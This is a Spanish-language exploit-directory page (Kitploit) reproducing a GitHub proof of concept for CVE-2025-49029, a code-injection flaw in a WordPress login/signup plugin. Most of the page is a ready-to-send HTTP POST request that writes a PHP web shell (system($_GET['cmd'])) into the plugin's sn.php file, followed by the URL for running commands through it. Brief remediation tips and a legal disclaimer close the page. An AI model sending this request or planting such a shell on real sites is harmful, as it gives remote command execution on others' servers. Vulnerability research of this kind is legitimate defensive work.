Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49029 — WordPress Custom Login And Signup Widget Plugin <= 1.0 es vulnerable a Ejecución de Código Arbitrario | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-49029
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-49029

CVE-2025-49029

WordPress Custom Login And Signup Widget Plugin <= 1.0 es vulnerable a Ejecución de Código Arbitrario

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 Plugin de WordPress Custom Login And Signup Widget <= 1.0 - Ejecución Arbitraria de Código (RCE)

🐞 Resumen de la vulnerabilidad

La vulnerabilidad Control inadecuado de la generación de código ('Inyección de código') en bitto.Kazi Custom Login And Signup Widget permite la ejecución arbitraria de código PHP por parte de usuarios administradores autenticados.
Este problema afecta a todas las versiones hasta la 1.0 inclusive.

🔥 Puntuación base: 9.1 (CRÍTICA)
CWE ID: CWE-94 – Control inadecuado de la generación de código ('Inyección de código')


🧠 Descripción

El plugin permite a los administradores modificar el contenido de sn.php a través del campo Nombre del remitente en la página de configuración.
La entrada proporcionada por el usuario se escribe directamente en un archivo PHP sin saneamiento ni validación.

Como resultado, cualquier código PHP proporcionado en el parámetro text se almacenará dentro de un archivo PHP y se ejecutará al realizar una solicitud directa, lo que conduce a la .

ejecución remota de código (RCE)

📍 Endpoint vulnerable

root@kitploit:~
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes

📥 Petición (formato Burp Suite)

root@kitploit:~
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i

text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

💉 Punto de inyección

  • Parámetro: text
  • Tipo: POST
  • Rol requerido: Administrador
  • Archivo afectado: sn.php (include de configuración del plugin)

🧬 Contenido inyectado almacenado en el archivo

root@kitploit:~
<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>

📁 Archivo en el que se escribe:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php

Tras una inyección exitosa, accede directamente a él para ejecutar comandos mediante:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id

🛡️ Recomendaciones

  • Restringir las operaciones de escritura de archivos.
  • Sanear y validar todas las entradas antes de escribirlas en archivos PHP.
  • Nunca permitir que se escriba contenido dinámico en archivos .php.

⚠️ Aviso legal

Este proyecto ha sido creado únicamente con fines educativos y de investigación.
Cualquier uso de la información proporcionada es bajo su propio riesgo.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este contenido.


✍️ Por: Khaled_Alenazi (Nxploited)

Descargar herramienta